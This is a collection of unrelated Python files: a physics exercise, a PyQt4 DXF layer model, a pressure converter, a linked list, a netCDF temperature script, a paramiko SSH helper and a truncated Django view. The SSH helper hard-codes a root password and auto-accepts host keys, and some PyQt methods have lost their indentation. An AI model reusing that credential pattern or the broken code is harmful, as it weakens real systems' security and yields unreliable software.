    return calculate_height(v0_y, apex_time, a_y, y0)
def solve_a():
    """Task a): print the max height for a vertical toss with v0 = 5 m/s."""
    print("a)\n")
    print(calculate_max_height(5))
def solve_b():
    """Task b): print the max height for a vertical toss with v0 = 10 m/s."""
    print("\nb)\n")
    print(calculate_max_height(10))
def solve_c():
    """Task c): scatter-plot max height versus initial velocity for
    v0 in [0, 20) m/s in steps of 0.1."""
    print("\nc)\n")
    v0_start = 0
    v0_slutt = 20
    v0_steg = 0.1
    v0_arr = np.arange(v0_start, v0_slutt, v0_steg)
    # calculate_max_height is written for scalars, so the ndarray cannot
    # be passed directly (that raises a ValueError); build the result
    # array from per-element calls instead.
    y_max = np.array([calculate_max_height(v0) for v0 in v0_arr])
    ax = plt.subplot(111)
    ax.spines["top"].set_visible(False)
    ax.spines["right"].set_visible(False)
    plt.scatter(v0_arr, y_max)
    plt.xlabel("Initial velocity (m/s)", fontsize=16)
    plt.ylabel("Max height (m)", fontsize=16)
    plt.show()
# Run all three sub-tasks when executed as a script.
if __name__ == "__main__":
    solve_a()
    solve_b()
    solve_c()
|
#!/usr/bin/env python
import numpy as np
#!/usr/bin/env python
import sip

# Select PyQt4's v2 APIs (QString -> str, QVariant -> native types, ...)
# BEFORE PyQt4 is imported; sip.setapi must run first or the import fails.
API_NAMES = ["QDate", "QDateTime", "QString", "QTextStream", "QTime", "QUrl", "QVariant"]
API_VERSION = 2
for name in API_NAMES:
    sip.setapi(name, API_VERSION)
from PyQt4 import QtCore, QtGui, uic
# from source.dxf2shape import *
import itertools
class DoubleSpinBoxDelegate(QtGui.QItemDelegate):
    """Item delegate that edits numeric cells with a QDoubleSpinBox,
    configured per column via the model's getSpinVars()."""

    def createEditor(self, parent, option, index):
        editor = QtGui.QDoubleSpinBox(parent)
        editor.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
        # getSpinVars returns [(min, max), decimals, step] or False for
        # columns that are not spin-edited.
        spin_vars = index.model().getSpinVars(index)
        if spin_vars != False:
            spin_range = spin_vars[0]
            spin_decimals = spin_vars[1]
            spin_steps = spin_vars[2]
            editor.setDecimals(spin_decimals)
            editor.setRange(*spin_range)
            editor.setSingleStep(spin_steps)
        return editor

    def setEditorData(self, spinBox, index):
        # Push the model's EditRole value into the editor.
        value = index.model().data(index, QtCore.Qt.EditRole)
        try:
            spinBox.setValue(value)
        except:
            pass
            # NOTE(review): the original (indentation-mangled) source is
            # ambiguous about whether clear() runs only on failure or
            # always; clearing only on failure is assumed here -- confirm.
            spinBox.clear()

    def setModelData(self, spinBox, model, index):
        # Commit the editor's (re-interpreted) text back to the model.
        spinBox.interpretText()
        value = spinBox.value()
        model.setData(index, value, QtCore.Qt.EditRole)

    def updateEditorGeometry(self, editor, option, index):
        editor.setGeometry(option.rect)
class ColorDelegate(QtGui.QItemDelegate):
    """Delegate that pops a modal color dialog and writes the chosen RGB
    triple straight into the model.

    NOTE(review): createEditor implicitly returns None (no editor
    widget); the dialog itself commits the data via setData.
    """

    def createEditor(self, parent, option, index):
        color_dialog = QtGui.QColorDialog(parent)
        color_dialog.setCurrentColor(QtGui.QColor(255,255,255))
        color_dialog.setOption(color_dialog.DontUseNativeDialog,True)
        color_dialog.setOption(color_dialog.ShowAlphaChannel,True)
        changed = color_dialog.exec_()
        if changed:
            # Drop the alpha channel; the model stores (r, g, b).
            color = list(color_dialog.currentColor().getRgb())[:-1]
            index.model().setData(index, color, QtCore.Qt.EditRole)
class TreeItem(object):
    """One node of the sketch tree: holds per-column display data plus
    dxf/plot geometry and drawing parameters (angle, step, rate, ...).

    Parent/child links form the tree used by TreeModel.
    """

    def __init__(self, data, parent=None, model=None):
        self.model = model                      # owning TreeModel
        self.color = (255,255,255)              # RGB display color
        self.is_closed = False                  # closed-polyline flag
        self.parentItem = parent
        self.itemData = data                    # one value per column
        self.childItems = []
        self.dxfData = None                     # raw dxf2shape output
        self.pltData = None                     # dxfData reshaped to (n, 2) points
        self.show = False
        self.handle = None
        self.entity = None                      # source dxf entity, if any
        self.pltHandle = []
        self.checkState = QtCore.Qt.Unchecked   # tri-state check flag
        self.fillAngle = 0                      # hatch fill angle
        self.fillStep = 0.1                     # hatch fill spacing
        self.volt = 20.0
        self.rate = 1.0                         # sketch speed (length/time)
        self.length = 0.0                       # total path length
        self.sketchTime = 0.0                   # estimated sketch duration
        # shape.type = None # [VirtualElectrode, line, area]

    def index(self):
        # Model index of this item's parent row.
        index = self.model.createIndex(self.parentItem.childNumber(), 0, self.parentItem)
        return index

    def redraw(self):
        """Re-run dxf2shape with the current fill parameters."""
        if self.entity != None:
            self.setDxfData(dxf2shape(self.entity, fill_step = self.fillStep, fill_angle=self.fillAngle))

    def setColor(self,color):
        self.color=color

    def setCheckState(self, value):
        """Map an int check value (2/1/other) to the Qt tri-state enum."""
        if value == 2:
            self.checkState = QtCore.Qt.Checked
        elif value == 1:
            self.checkState = QtCore.Qt.PartiallyChecked
        else:
            self.checkState = QtCore.Qt.Unchecked
        return self.checkState

    def setEntity(self, entity):
        self.entity = entity
        self.redraw()

    def setDxfData(self, data):
        """Store geometry and refresh plot data + time estimate."""
        self.dxfData = data
        self.pltData = []
        for k in self.dxfData:
            self.pltData.append(k.reshape((-1,2)))
        self.calcTime()

    def calcLength(self):
        """Sum of distances between consecutive plot points -> self.length."""
        try:
            dat = np.concatenate(self.pltData).reshape((-1,2))
        except:
            # print 'error calculating length'
            return
        dat_b = np.roll(dat,-2)
        dist = 0
        for k in range(len(dat)-1):
            dist += np.linalg.norm(dat[k]-dat_b[k])
        self.length = dist

    def calcTime(self):
        """Estimate sketch time: length/rate for leaves, sum of checked
        children otherwise; result is also written to column 5."""
        if self.childCount() == 0:
            self.calcLength()
            self.sketchTime = self.length / float(self.rate)
        else:
            self.sketchTime = 0.0
            # self.setData(5,self.sketchTime)
            for i in range(self.childCount()):
                if self.child(i).checkState == 2:
                    self.sketchTime += self.child(i).sketchTime
        self.setData(5,round(float(self.sketchTime),1))

    def child(self, row):
        return self.childItems[row]

    def childCount(self):
        return len(self.childItems)

    def childNumber(self):
        # Row of this item within its parent (0 for the root).
        if self.parentItem != None:
            return self.parentItem.childItems.index(self)
        return 0

    def columnCount(self):
        return len(self.itemData)

    def data(self, column=None):
        """Column value, or a copy of the whole row when column is None."""
        self.calcTime()
        if column == None:
            return self.itemData[:]
        return self.itemData[column]

    def insertChildren(self, position, count, columns):
        # print('insertChildren')
        if position < 0 or position > len(self.childItems):
            return False
        for row in range(count):
            data = [None for v in range(columns)]
            item = TreeItem(data, self, self.model)
            self.childItems.insert(position, item)
        return True

    def insertColumns(self, position, columns):
        """Insert empty columns here and recursively in all children."""
        if position < 0 or position > len(self.itemData):
            return False
        for column in range(columns):
            self.itemData.insert(position, None)
        for child in self.childItems:
            child.insertColumns(position, columns)
        return True

    def parent(self):
        return self.parentItem

    def removeChildren(self, position, count):
        # print('removeChildren')
        if position < 0 or position + count > len(self.childItems):
            return False
        for row in range(count):
            self.childItems.pop(position)
        return True

    def removeColumns(self, position, columns):
        """Remove columns here and recursively in all children."""
        if position < 0 or position + columns > len(self.itemData):
            return False
        for column in range(columns):
            self.itemData.pop(position)
        for child in self.childItems:
            child.removeColumns(position, columns)
        return True

    def setData(self, column, value, index=None):
        """Store a cell value; named columns also update the matching
        drawing parameter and trigger a redraw / time recalculation."""
        if column < 0 or column >= len(self.itemData):
            return False
        # print(self.model.rootData[column],column, value)
        if self.model.rootData[column] == 'Angle':
            value= float(value)
            if self.fillAngle != value:
                self.fillAngle = value
                self.redraw()
        elif self.model.rootData[column] == 'Rate':
            value= float(value)
            if self.rate != value:
                self.rate = value
                self.calcTime()
        elif self.model.rootData[column] == 'Step':
            value= float(value)
            if self.fillStep != value:
                self.fillStep = value
                self.redraw()
        elif self.model.rootData[column] == 'Closed':
            value= bool(value)
            if self.is_closed != value:
                self.is_closed = value
                self.redraw()
        elif self.model.rootData[column] == 'Time':
            value= float(value)
            if self.sketchTime != value:
                self.sketchTime = value
            # The root row shows the header text instead of a number.
            if self.parent() == None:
                value = 'Time'
        elif self.model.rootData[column] == 'Color':
            self.color = value
        self.itemData[column] = value
        return True
class TreeModel(QtCore.QAbstractItemModel):
    """Qt item model exposing a tree of TreeItem rows (dxf sketch layers)."""

    def __init__(self, headers, data, parent=None):
        super(TreeModel, self).__init__(parent)
        self.checks = {}
        self.rootData = [header for header in headers] # Header Names
        self.rootItem = TreeItem(self.rootData, model=self)
        self.setupModelData(data, self.rootItem)
        # Per-cell check bookkeeping, indexed [row][column].
        self._checked=[[False for i in range(self.columnCount())] for j in range(self.rowCount())]

    def columnCount(self, parent=QtCore.QModelIndex()):
        # Column count is fixed by the header row, regardless of parent.
        return self.rootItem.columnCount()

    def getSpinVars(self,index):
        """Spin-box configuration for the column of `index`:
        [(min, max), decimals, step], or False for non-spin columns."""
        column = index.column()
        #        (min, max)     decimals  step
        if self.rootData[column] == 'Angle':
            return [(-3600,3600), 1, 1.0]
        elif self.rootData[column] == 'Voltage':
            return [(-210,210), 1, 0.1]
        elif self.rootData[column] == 'Step':
            return [(0.001,1000), 3, 0.01]
        elif self.rootData[column] == 'Rate':
            return [(0.01,1000), 2, 0.1]
        else:
            return False
    def data(self, index, role):
        """Role-dispatched cell data: check state for column 0 (and the
        entity's is_closed flag for column 6), background color for the
        Color column, otherwise the item's display/edit value."""
        if not index.isValid():
            return None
        if role == QtCore.Qt.CheckStateRole:
            if index.column() == 0:
                return self.checkState(index)
            if index.column() == 6:
                item = self.getItem(index)
                try:
                    return item.entity.is_closed
                except:
                    # Items without a dxf entity fall through.
                    pass
        item = self.getItem(index)
        if (role == QtCore.Qt.BackgroundRole) & (self.rootData[index.column()] == 'Color'):
            return QtGui.QColor(*item.color)
        if role != QtCore.Qt.DisplayRole and role != QtCore.Qt.EditRole:
            return None
        return item.data(index.column())
    def flags(self, index):
        """Name/Time/Type columns are read-only; all others are editable.
        Everything supports checking, dragging and dropping."""
        if not index.isValid():
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsDropEnabled
        colname = self.rootData[index.column()]
        if colname in ['Name', 'Time', 'Type']:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable |QtCore.Qt.ItemIsDropEnabled |QtCore.Qt.ItemIsDragEnabled
        return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsUserCheckable |QtCore.Qt.ItemIsDropEnabled |QtCore.Qt.ItemIsDragEnabled

    def supportedDropActions( self ):
        '''Items can be moved and copied (but we only provide an interface for moving items in this example.'''
        # print('supportedDropActions')
        return QtCore.Qt.MoveAction # | QtCore.Qt.CopyAction
    def getItem(self, index):
        """Return the TreeItem behind index; the root item for invalid
        indexes or null internal pointers."""
        if index.isValid():
            item = index.internalPointer()
            if item:
                return item
        return self.rootItem

    def checkState(self, index):
        # Delegate to the item's own tri-state flag.
        return self.getItem(index).checkState

    def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
        """Horizontal header text comes from the root item's row."""
        if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
            return self.rootItem.data(section)
        return None
    def index(self, row, column=0, parent=QtCore.QModelIndex()):
        """Create a model index for (row, column) under parent."""
        if parent.isValid() and parent.column() != 0:
            return QtCore.QModelIndex()
        parentItem = self.getItem(parent)
        childItem = parentItem.child(row)
        if childItem:
            return self.createIndex(row, column, childItem)
        else:
            return QtCore.QModelIndex()

    def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
        """Insert columns into every row, wrapped in begin/end notifications."""
        self.beginInsertColumns(parent, position, position + columns - 1)
        success = self.rootItem.insertColumns(position, columns)
        self.endInsertColumns()
        return success

    def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
        """Insert empty child rows under parent, with notifications."""
        # print('insert rows')
        parentItem = self.getItem(parent)
        self.beginInsertRows(parent, position, position + rows - 1)
        success = parentItem.insertChildren(position, rows,
                self.rootItem.columnCount())
        self.endInsertRows()
        return success
    def parent(self, index):
        """Model index of index's parent; invalid for top-level rows."""
        if not index.isValid():
            return QtCore.QModelIndex()
        childItem = self.getItem(index)
        parentItem = childItem.parent()
        if parentItem == self.rootItem:
            return QtCore.QModelIndex()
        return self.createIndex(parentItem.childNumber(), 0, parentItem)

    def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
        """Remove columns from every row; when none remain, drop all rows too."""
        self.beginRemoveColumns(parent, position, position + columns - 1)
        success = self.rootItem.removeColumns(position, columns)
        self.endRemoveColumns()
        if self.rootItem.columnCount() == 0:
            self.removeRows(0, self.rowCount())
        return success

    def removeRows(self, position, rows, parent=QtCore.QModelIndex()):
        """Remove child rows under parent, with notifications."""
        # print('remove rows')
        parentItem = self.getItem(parent)
        self.beginRemoveRows(parent, position, position + rows - 1)
        success = parentItem.removeChildren(position, rows)
        self.endRemoveRows()
        return success

    def rowCount(self, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        return parentItem.childCount()

    def childCount(self, parent=QtCore.QModelIndex()):
        # Alias for rowCount kept for callers using tree terminology.
        return self.rowCount(parent)

    def are_parent_and_child(self, parent, child):
        """True when `parent` is `child` or one of its ancestors."""
        while child.isValid():
            if child == parent:
                return True
            child = child.parent()
        return False
    def setData(self, index, value, role=QtCore.Qt.EditRole):
        """Handle check toggles on column 0 (propagating down to children
        and re-deriving the parent's tri-state), and EditRole writes
        (propagating parameter columns down to children)."""
        if (role == QtCore.Qt.CheckStateRole and index.column() == 0):
            self.layoutAboutToBeChanged.emit()
            item = self.getItem(index)
            item.setCheckState(value)
            self.emit(QtCore.SIGNAL('checkChanged(QModelIndex)'), index)
            # Propagate the new state to every child row.
            cc = item.childCount()
            if cc > 0:
                for i in range(cc):
                    chindex = self.createIndex(i, 0, item.child(i))
                    self.setData(chindex,value,role)
            # Re-derive the parent's state from its children:
            # all checked -> checked, some -> partial, none -> unchecked.
            item = self.getItem(index.parent())
            cc = item.childCount()
            no_checked = 0
            if cc > 0:
                # item.sketchTime = 0.0
                # item.setData(5,item.sketchTime)
                for i in range(cc):
                    if item.child(i).checkState == 2:
                        no_checked+=1
                        # item.sketchTime += item.child(i).sketchTime
                        # if item.child(i).childCount() == 0:
                        #     item.setData(5,item.sketchTime)
                if no_checked == cc:
                    item.setCheckState(2)
                elif no_checked > 0:
                    item.setCheckState(1)
                else:
                    item.setCheckState(0)
            # self.emit(QtCore.SIGNAL('checkChanged(QModelIndex)'), index.parent())
            self.layoutChanged.emit()
            return True
        # self.emit(QtCore.SIGNAL('dataChanged(QModelIndex)'), index)
        if role != QtCore.Qt.EditRole:
            return False
        item = self.getItem(index)
        # print(item)
        colname = self.rootData[index.column()]
        # Parameter columns cascade the new value to all children first.
        if colname in ['Voltage', 'Angle', 'Rate', 'Step', 'Color']:
            cc = item.childCount()
            if cc > 0:
                for i in range(cc):
                    chindex = self.createIndex(i, index.column(), item.child(i))
                    self.setData(chindex,value,role)
        result = item.setData(index.column(), value, index)
        if result:
            self.emit(QtCore.SIGNAL('redraw(QModelIndex,QModelIndex)'), index,index)
            self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index,index)
        return result

    def setHeaderData(self, section, orientation, value, role=QtCore.Qt.EditRole):
        """Edit a horizontal header label (stored on the root item)."""
        if role != QtCore.Qt.EditRole or orientation != QtCore.Qt.Horizontal:
            return False
        result = self.rootItem.setData(section, value)
        if result:
            self.headerDataChanged.emit(orientation, section, section)
        return result
def getColumns(self):
columns = []
for i in range(self.columnCount()):
columns.append(self.headerData(i,QtCore.Qt.Horizontal))
return columns
def getRows(self):
rows = []
for i in range(self.rowCount()):
rows.append(self.getItem(self.index(i)))
return rows
    def clearData(self):
        # Drop all rows by replacing the invisible root with a fresh TreeItem.
        self.rootItem = TreeItem(self.rootData, model=self)
    def mimeTypes(self):
        # Only the standard internal-move MIME type is supported for drag & drop.
        return ['application/x-qabstractitemmodeldatalist']
    def mimeData(self, indexes):
        # Build a minimal MIME payload for internal drags; *indexes* is unused.
        # NOTE(review): QMimeData.setData expects bytes/QByteArray -- passing the
        # str 'mimeData' may fail on PyQt5; confirm against the binding in use.
        mimedata = QtCore.QMimeData()
        mimedata.setData('application/x-qabstractitemmodeldatalist', 'mimeData')
        return mimedata
# def dropMimeData(self, data, action, row, column, parent):
# print ('dropMimeData %s %s %s %s' % (data.data('text/xml'), action, row, parent))
# return True
    def dropMimeData(self, data, action, row, column, parent):
        """Handle a drop of model-item MIME data by bumping a per-name counter.

        NOTE(review): this body uses QStandardItemModel APIs (self.item,
        self.appendRow) and Qt4-style .toString() -- confirm this path is ever
        reached on this model class.
        """
        print(data, action, row, column, parent)  # debug trace
        if data.hasFormat('application/x-qabstractitemmodeldatalist'):
            bytearray = data.data('application/x-qabstractitemmodeldatalist')
            data_items = self.decode_data (bytearray)
            # Assuming that we get at least one item, and that it defines
            # text that we can display.
            text = data_items[0][QtCore.Qt.DisplayRole].toString()
            # NOTE(review): the loop variable shadows the `row` parameter.
            for row in range(self.rowCount()):
                name = self.item(row, 0).text()
                if name == text:
                    # Name already present: increment its count in column 1.
                    number_item = self.item(row, 1)
                    number = int(number_item.text())
                    number_item.setText(str(number + 1))
                    break
            else:
                # Name not found: append a new row with a count of 1.
                name_item = QtCore.QStandardItem(text)
                number_item = QtCore.QStandardItem("1")
                self.appendRow([name_item, number_item])
            return True
        else:
            return QtCore.QStandardItemModel.dropMimeData(self, data, action, row, column, parent)
def decode_data(self, bytearray):
data = []
item = {}
ds = QtCore.QDataStream(bytearray)
while not ds.atEnd():
row = ds.readInt32()
column = ds.readInt32()
map_items = ds.readInt32()
for i in range(map_items):
key = ds.readInt32()
value = ""
ds >> value
item[QtCore.Qt.ItemDataRole(key)] = value
data.append(item)
return data
    def setupModelData(self, data, parent):
        """Populate the tree from a DXF document *data* under *parent*.

        First pass: one child row per non-empty, non-'0' layer.
        Second pass: one grandchild row per supported entity, attached to its
        layer's row.

        NOTE(review): the parameter `data` is reassigned to a numpy array inside
        the entity loop, and `parent`/`thisChild` from the first loop leak into
        the second (`thisChild.is_closed` is set before `thisChild` is rebound
        on the first entity) -- confirm this ordering is intended.
        """
        layers = {layer.dxf.name:{'entity': layer} for layer in data.layers if layer.dxf.name!='0'}
        # print([layer.dxf.name for layer in data.layers if layer.dxf.name!='0'])
        columns = self.getColumns()
        # Pass 1: create a row for every layer that actually contains entities.
        for ll in layers:
            nchildren = len(data.modelspace().query('*[layer=="%s"]'%ll).entities)
            if nchildren == 0:
                continue
            layer = layers[ll]
            entity = layer['entity']
            # print(ll, layer['entity'].is_on(), layer['entity'].is_locked())
            parent.insertChildren(parent.childCount(), 1, self.rootItem.columnCount())
            thisChild = parent.child(parent.childCount() -1)
            thisChild.handle = layer
            layer['parent'] = thisChild
            item_data = {'Name': ll,
                         'Type': entity.dxftype(),
                         'Closed': 0,
                         'Voltage': thisChild.volt,
                         'show': layer['entity'].is_on(),
                         'Angle': thisChild.fillAngle,
                         'Rate': thisChild.rate,
                         'Step': thisChild.fillStep,
                         'Time': thisChild.sketchTime}
            # Copy only the values whose column exists in the current header.
            for column in range(len(columns)):
                key = columns[column]
                if key in item_data:
                    # print(column, item_data[key])
                    thisChild.setData(column, item_data[key])
        ms = data.modelspace()
        cnt = -1
        # Pass 2: attach every supported entity to its layer's row.
        for entity in ms:
            cnt+=1
            ll = entity.dxf.layer
            if ll not in layers:
                continue
            # print(entity.dxftype())
            if entity.dxftype() in ['IMAGE', 'SPLINE']:
                continue
            thisChild.is_closed = False
            if entity.dxftype()=='POLYLINE':
                # A polyline is closed when its first and last points coincide.
                data = np.array(list(entity.points()))
                if(all(data[0] == data[-1])):
                    thisChild.is_closed = True
            if entity.dxftype()=='LINE':
                thisChild.is_closed = False
                data = np.array([entity.dxf.start, entity.dxf.end])
            parent = layers[ll]['parent']
            parent.insertChildren(parent.childCount(), 1, self.rootItem.columnCount())
            thisChild = parent.child(parent.childCount() -1)
            thisChild.handle = entity
            thisChild.color = entity.get_rgb_color()
            item_data = {'Name': entity.dxf.handle,
                         'Type': entity.dxftype(),
                         'Closed': thisChild.is_closed,
                         'Voltage': thisChild.volt,
                         'show': thisChild.show,
                         'Angle': thisChild.fillAngle,
                         'Rate': thisChild.rate,
                         'Step': thisChild.fillStep,
                         'Time': thisChild.sketchTime,
                         'Color': entity.get_rgb_color()}
            # print columnData
            for column in range(len(columns)):
                key = columns[column]
                if key in item_data:
                    # print(column, item_data[key])
                    thisChild.setData(column, item_data[key])
|
# conversion pa / mbar / atm / psi
def multi_cnv_pression(val, unit):
    """Convert the pressure *val*, given in *unit*, to the three other units.

    Supported units: 'pa', 'mbar', 'atm', 'psi'.  Returns a one-line summary
    string.

    Fixes over the original:
    * an unknown unit now returns an explicit error string instead of raising
      NameError (start_txt was unbound);
    * the header reports the actual source unit (it always said "pa");
    * all conversions go through one table of pascal factors, so the psi
      factor is consistent (the original mixed 6895 and 6894.76 Pa/psi).
    """
    to_pascal = {'pa': 1.0, 'mbar': 100.0, 'atm': 101325.0, 'psi': 6894.76}
    if unit not in to_pascal:
        return "Unknown unit: " + str(unit)
    targets = [u for u in ('pa', 'mbar', 'atm', 'psi') if u != unit]
    header = ("The convertion of " + str(val) + " " + unit + " in "
              + "/".join(targets) + " = ")
    # Each converted value keeps the original ", <value> <unit>" formatting.
    parts = "".join(", " + str(val * to_pascal[unit] / to_pascal[u]) + " " + u
                    for u in targets)
    return header + parts
# Interactive driver.  Fix: the original printed "Ok lets try again" but then
# exited anyway; it now actually loops until the user declines.
print("Small routine to convert pression pa/mbar/atm/psi")
while True:
    unit = input("Give the unit of pression to convert: ")
    value = input("Give the value of pression: ")
    print(multi_cnv_pression(float(value), unit))
    again = input("Would you convert a new value? Yes or No : ")
    if again == "Yes":
        print("Ok lets try again")
        continue
    if again == "No":
        print("Program terminated , see you soon")
    break
|
class Node:
    """One element of a doubly linked list."""
    def __init__(self, value=None):
        self.value = value  # payload
        self.prev = None    # previous node, or None at the head
        self.next = None    # next node, or None at the tail
class DoublyList:
    """A doubly linked list with positional insert/delete and simple search."""

    def __init__(self):
        self.head = None
        self.tail = None

    def __iter__(self):
        """Yield the nodes (not the values) head-to-tail."""
        node = self.head
        while node:
            yield node
            node = node.next

    def __len__(self):
        """Count the nodes by walking the chain (O(n))."""
        count = 0
        node = self.head
        while node:
            count += 1
            node = node.next
        return count

    def createList(self, value):
        """Turn an empty list into a one-element list holding *value*."""
        first = Node(value)
        self.head = first
        self.tail = first

    def insertAt(self, position, value):
        """Insert *value* at *position* (0 = head, >= len appends at the tail).

        On an empty list the position is ignored and the list is created.
        Negative positions only print an error message.
        """
        if self.head is None:
            self.createList(value)
            return
        node = Node(value)
        size = len(self)
        if position == 0:
            # New head.
            node.next = self.head
            self.head.prev = node
            self.head = node
        elif position >= size:
            # Append at the tail.
            node.next = None
            self.tail.next = node
            node.prev = self.tail
            self.tail = node
        elif 0 < position < size:
            # Splice after the node at position-1.
            before = self.head
            for _ in range(position - 1):
                before = before.next
            node.next = before.next
            node.prev = before
            before.next.prev = node
            before.next = node
        else:
            print('Invalid index entered ')

    def deleteNode(self, position):
        """Delete the node at *position* (>= len removes the tail).

        Printing an error on an empty list or a negative position; a
        single-element list is emptied regardless of *position*.
        """
        if self.head is None:
            print('List is empty')
            return
        size = len(self)
        if size == 1:
            self.head = None
            self.tail = None
        elif position == 0:
            self.head = self.head.next
            self.head.prev = None
        elif position >= size:
            self.tail = self.tail.prev
            self.tail.next = None
        elif 0 < position < size:
            before = self.head
            for _ in range(position - 1):
                before = before.next
            after = before.next.next  # node following the one being deleted
            after.prev = before
            before.next = after
        else:
            print('Invalid index entered')

    def deleteList(self):
        """Detach every node and forget both ends."""
        node = self.head
        while node:
            node.prev = None
            node = node.next
        self.head = None
        self.tail = None

    def traverse(self):
        """Print the values head-to-tail on one line."""
        for node in self:
            print(node.value, end=' ')
        print()

    def reverse(self):
        """Print the values tail-to-head on one line."""
        node = self.tail
        while node:
            print(node.value, end=' ')
            node = node.prev
        print()

    def search(self, data):
        """Return a found/not-found message for *data* ('List is empty' when empty)."""
        if self.head is None:
            return 'List is empty'
        for node in self:
            if node.value == data:
                return str(data) + ' found!!'
        return str(data) + ' Not found'
if __name__ == '__main__':
    # Demo: build a list, insert at both ends and in the middle, print,
    # then delete the tail and show both traversal directions.
    List = DoublyList()
    print([node.value for node in List])
    List.insertAt(1, 1)  # first insert on an empty list just creates [1]
    List.insertAt(1, 2)
    List.insertAt(2, 3)
    List.insertAt(3, 4)
    List.insertAt(4, 5)
    List.insertAt(5, 6)
    print([node.value for node in List])
    print('Length = ' + str(len(List)))
    List.insertAt(0, 0)                   # new head
    List.insertAt(List.__len__(), 100)    # append at the tail
    print([node.value for node in List])
    print('Length = ' + str(len(List)))
    # List.traverse()
    # List.reverse()
    List.insertAt(2, 12)                  # middle insert
    print([node.value for node in List])
    print('Length = ' + str(len(List)))
    List.traverse()
    List.reverse()
    # print(List.search(230))
    print('========================')
    List.traverse()
    List.deleteNode(List.__len__())       # position >= len deletes the tail
    List.traverse()
    List.reverse()
|
class Pattern(object):
    """Minimal placeholder object that can announce itself."""

    def __init__(self):
        super(Pattern, self).__init__()

    def do_something(self):
        # Report that this instance is a pattern.
        print('I\'m a pattern!')
|
#!/usr/bin/env python
#plt.ion()
'''
QT (Quality Codes):
0=missing data
1=highest
2=standard
3=lower
4=questionable
5=bad
ST (Source Codes):
0 = No Sensor, No Data
1 = Real Time (Telemetered Mode) *
2 = Derived from Real Time *
3 = Temporally Interpolated from Real Time
4 = Source Code Inactive at Present
5 = Recovered from Instrument RAM (Delayed Mode) *
6 = Derived from RAM *
7 = Temporally Interpolated from RAM
'''
from netCDF4 import Dataset
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, timedelta
# Needed for the spatial interpolation below (was missing, `griddata` raised
# NameError).
from scipy.interpolate import griddata

# load the data
PATH = 'sst_xyt_dy.cdf'
data = Dataset(PATH)
# define dimensions
lat = data.variables['lat'][:]    # degrees_north
lon = data.variables['lon'][:]    # degrees_east
time = data.variables['time'][:]  # centered time, in days since the epoch below
TIME = [datetime(1979, 1, 20, 12, 0, 0) + int(i) * timedelta(days=1) for i in time]
# define variables
T = data.variables['T_20'][:, 0, :, :]      # TEMPERATURE degree_C
ST = data.variables['ST_6020'][:, 0, :, :]  # TEMPERATURE SOURCE
QT = data.variables['QT_5020'][:, 0, :, :]  # TEMPERATURE QUALITY
# only "good data": mask missing (QT==0) and below-standard (QT>2) points
tq = np.ma.masked_where(QT == 0, np.ma.masked_where(QT > 2, T))
# how many valid points per time step
points = np.zeros(len(time))
for t in range(len(time)):
    points[t] = sum(sum(~tq.mask[t, :, :]))
fig = plt.figure(figsize=(10, 7))
ax = fig.add_subplot(111)
plt.plot(time, points)
# map
m = Basemap(projection='robin',
            lat_0=0,
            lon_0=-155,
            resolution='c')
m.fillcontinents()
# interpolation grid
xxi, yyi = np.mgrid[np.min(lon):np.max(lon):129j, np.min(lat):np.max(lat):103j]
zzi = np.zeros((len(time), len(xxi[:, 0]), len(yyi[0, :])))
for t in np.arange(len(time)):  # fixed: was bare `arange`
    # fixed: was bare `vstack`
    grid = np.vstack((lon[np.where(tq.mask[t] == 0)[1][:]],
                      lat[np.where(tq.mask[t] == 0)[0][:]])).T
    data1 = tq[t][np.where(tq.mask[t] == 0)].data
    zzi[t] = griddata(grid, data1, (xxi, yyi), method='linear')
    # fixed: np.masked_where does not exist; the masking helper lives in np.ma
    zzi[t] = np.ma.masked_where(zzi[t] == 0, zzi[t])
# ploting
fig2 = plt.figure(figsize=(10, 7))
ax2 = fig2.add_subplot(111)
'''
colors = np.array(['#ffffff','#00cc00','#99ff66','#ffff00','#ff9933','#ff0000'])
x, y = m(*np.meshgrid(lon, lat))
plt.scatter(x,y,c=colors[QT[0,:,:]])
plt.show()
'''
# For each year (skipping the first 8) and month, keep the index of the time
# step with the most valid points.
t = []
years = np.array([(d.year) for d in TIME])
months = np.array([(m.month) for m in TIME])
for yy in np.unique(years)[8:-1]:
    for mm in np.unique(months):
        pos = np.where(((years == yy) & (months == mm)))
        # print pos
        t.append(pos[0][np.where(points[pos] == (points[pos].max()))[0][0]])
# NOTE(review): the two lines below referenced undefined `year`/`month` and the
# first contained a syntax error (`years=year`); kept commented out until their
# intent is clarified.
# indx = points[np.where((years == year) & (months == month))].max()
# indx = np.where(years == year)
|
import paramiko
import sys
def ssh_command(ip, user, passwd, command):
    """Run a single *command* on *ip* over SSH (Python 2 / paramiko).

    NOTE(review): the bare except hides every failure mode, and recv() is
    issued immediately after exec_command, so a slow command may return a
    truncated or empty reply -- confirm this is acceptable.
    """
    client = paramiko.SSHClient()
    #client.load_host_keys('/home/user/.ssh/known_hosts')
    # Auto-accepting unknown host keys disables man-in-the-middle protection.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip, username=user, password=passwd)
        ssh_session = client.get_transport().open_session()
        if ssh_session.active:
            ssh_session.exec_command(command)
            print ssh_session.recv(1024)
    except:
        print "[!!] Error."
    finally:
        return
# SECURITY(review): hard-coded root credentials checked into source.
ssh_command('192.168.1.1', 'root', 'takion01093896', 'ifconfig')
from django.shortcuts import render
import requests
from sklearn.externals import joblib
from .forms import PredictForm
from sklearn.externals import joblib
# Reference dataframe of real listings, loaded once at import time.
df = joblib.load('df.pkl')
def home(request):
    """Render the prediction page.

    On POST with a valid form: build a one-hot feature dict matching the
    trained model's columns, query the local prediction service, and look up
    a comparable real listing in the reference dataframe `df`.

